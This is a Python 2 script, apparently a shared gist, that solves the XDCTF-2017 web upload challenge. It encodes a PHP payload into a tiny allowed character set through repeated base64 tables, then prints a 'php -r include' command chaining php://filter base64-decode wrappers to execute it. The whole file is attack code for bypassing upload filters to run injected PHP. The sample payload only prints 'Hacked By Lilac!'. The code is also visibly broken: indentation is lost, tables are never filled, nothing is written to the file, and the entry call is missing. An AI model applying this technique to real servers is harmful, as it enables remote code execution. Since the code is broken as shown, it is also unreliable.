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Last active November 29, 2021 08:55
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#!/usr/bin/env python
# encoding:utf-8
# Author : WangYihang
# Date : 2017/10/03
# Email :
# Comment : to solve XDCTF-2017-WEB-Upload
import string
import itertools
import os
base64_chars = string.letters + string.digits + "+/"
def robust_base64_decode(data):
robust_data = ""
base64_charset = string.letters + string.digits + "+/"
for i in data:
if i in base64_charset:
robust_data += i
robust_data += "=" * (4 - len(robust_data) % 4)
return robust_data.decode("base64").replace("\n", "")
def robust_base64_encode(data):
return data.encode("base64").replace("\n", "").replace("=", "")
def enmu_table(allow_chars):
possible = list(itertools.product(allow_chars, repeat=4))
table = {}
for list_data in possible:
data = "".join(list_data)
decoded_data = data.decode("base64")
counter = 0
t = 0
for x in decoded_data:
if x in base64_chars:
counter += 1
t = x
if counter == 1:
table[t] = data
return table
def generate_cipher(tables, data):
encoded = robust_base64_encode(data)
result = encoded
for d in tables[::-1]:
encoded = result
result = ""
for i in encoded:
result += d[i]
return result
def enmu_tables(allow_chars):
filename = "".join(allow_chars)
tables = []
saved_length = 0
flag = True
while True:
table = enmu_table(allow_chars)
length = len(table.keys())
if saved_length == length:
flag = False
saved_length = length
# print "[+] %d => %s" % (length, table)
print "[+] Got %d chars : %s" % (length, table.keys())
allow_chars = table.keys()
if set(table.keys()) >= set(base64_chars):
if flag:
return tables
return False
def main():
data = "<?php echo 'Hacked By Lilac!';?>"
print "[+] Base64 chars : %s" % (base64_chars)
print "[+] Plain : %s" % (data)
chars = "a0"
print "[+] Start charset : [%s]" % (chars)
filename = chars
print "[+] Generating tables..."
tables = enmu_tables(set(chars))
if tables:
print "[+] Trying to encode data..."
cipher = generate_cipher(tables, data)
with open(filename, "w") as f:
print "[+] The encoded data is saved to file (%d Bytes) : %s" % (len(cipher), filename)
command = "php -r 'include(\"" + "php://filter/convert.base64-decode/resource=" * (
len(tables) + 1) + "%s\");'" % (filename)
print "[+] Usage : %s" % (command)
print "[+] Executing..."
print "[-] Failed : %s" % (tables)
if __name__ == "__main__":
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